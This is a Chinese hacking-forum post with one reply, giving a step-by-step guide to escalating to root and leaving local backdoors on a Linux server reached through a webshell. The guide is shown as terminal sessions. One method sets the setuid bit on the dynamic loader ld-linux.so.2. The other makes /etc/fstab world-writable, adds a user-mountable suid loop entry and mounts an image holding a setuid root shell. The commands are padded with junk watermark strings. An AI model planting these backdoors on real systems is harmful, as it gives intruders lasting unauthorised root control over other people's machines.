找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3039|回复: 1
打印 上一主题 下一主题

webshell下LINUX提权+留后门

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:56:25 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究
4 F5 H7 a' r6 s: S$ H
, N* o) \( B7 M/ T" s' }[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究$ b; a6 T& z3 k& ]7 G
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究+ D/ |, _# G* E5 K/ y/ `* [7 _
lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
+ T3 c# \( K" G8 n- Z" w' w[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究0 D" m" Q! P/ z- S
[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
- f( d4 R& i% S! B/ [/ B/ R-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究. ?& V8 H$ G3 M6 h. f: b$ ~5 |( Y
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究, S/ ~& J: a5 s8 ^9 y# g% G! c- V
[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究
4 i* G% d( Z+ d8 R5 V1 D- K我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究' |( X+ f' R' N# Q

( ?, Y( m3 k' G/ G. I( b7 U" c普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究
. K# I1 V% K' B3 j& Q0 `3 G; k* }( f: K/ J+ {- t$ s" Q
[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究# I6 c1 A! N* I; {# ?7 A# Q
xiaoyu2ezX-BUG-关注前沿信息安全技术研究! c  }+ H; Z8 B0 x
[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究' }6 a. h- R- Q+ G  k9 }
root2ezX-BUG-关注前沿信息安全技术研究
5 A  \! a7 ~1 Z" R[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究
; A! a: h1 ?. A# k" w7 }恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究
# k, Z4 i/ c  D
/ ?* i* n, U3 Z) k' g$ h方法二:2ezX-BUG-关注前沿信息安全技术研究
4 y) }* n$ _- h1 W, N5 m- Z0 e  l! K
) {  V/ o/ @' M! D) I看过程:2ezX-BUG-关注前沿信息安全技术研究
' G4 G5 K6 ]6 W8 M5 C
3 L3 Q6 t/ L1 c1 F2 Y$ C0 l/ ?[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究: W/ w% ]' Q. V. T/ A% U
[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究
- H0 {$ c0 V0 V; h/ E% N4 R5 `- D* d- ^$ y1 [9 V
这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
. f/ H+ q5 Q# a$ U" G: t: z3 l
[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
% n& G  R% E* n2 }' ^-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
3 `& \) C" m7 Z9 W5 I5 u' E0 t1 B5 o. _[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究( A  ]7 D2 @2 z  J& g. _
# C. J4 T# b: I( d7 ?
然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究$ J& T' j$ r1 A" y4 Q! Y
3 B: [9 \( N2 G$ e1 a; l
[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究
1 c4 h- S( T7 \-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究% i" s. T0 z4 C2 q4 U# ^  q/ g
[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究
( b' {! p& Z; l/ l' e% I[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究4 _: A: z" a6 H# [8 W& z
[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究7 x8 o; h7 V/ V, }! |# c
total 182ezX-BUG-关注前沿信息安全技术研究
8 t0 p$ m% L0 h# [1 G  c6 Fdrwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究  G/ O( a. j" |) m
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究: w6 R8 a  M# k/ C3 g; |
[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究
0 L0 d2 l# q5 d0 u! q/ A% l+ Dsh-3.2#2ezX-BUG-关注前沿信息安全技术研究
& Z. [" A* @3 k  L* W' `看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究$ S2 i0 ~7 D, @# X, J0 \
test这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究
; g+ t, p$ Q6 k& \& i2 Y
( v8 |, N: e9 V# ]5 V# X貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究
$ q# j; J1 f/ j& W9 `, {/ X2ezX-BUG-关注前沿信息安全技术研究; T$ o% o  P+ Q) c; W7 B4 @' }

8 j8 D( M' {0 |) u+ B7 r# o
回复

使用道具 举报

沙发
发表于 2013-3-13 15:10:29 | 只看该作者
谢谢分享
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表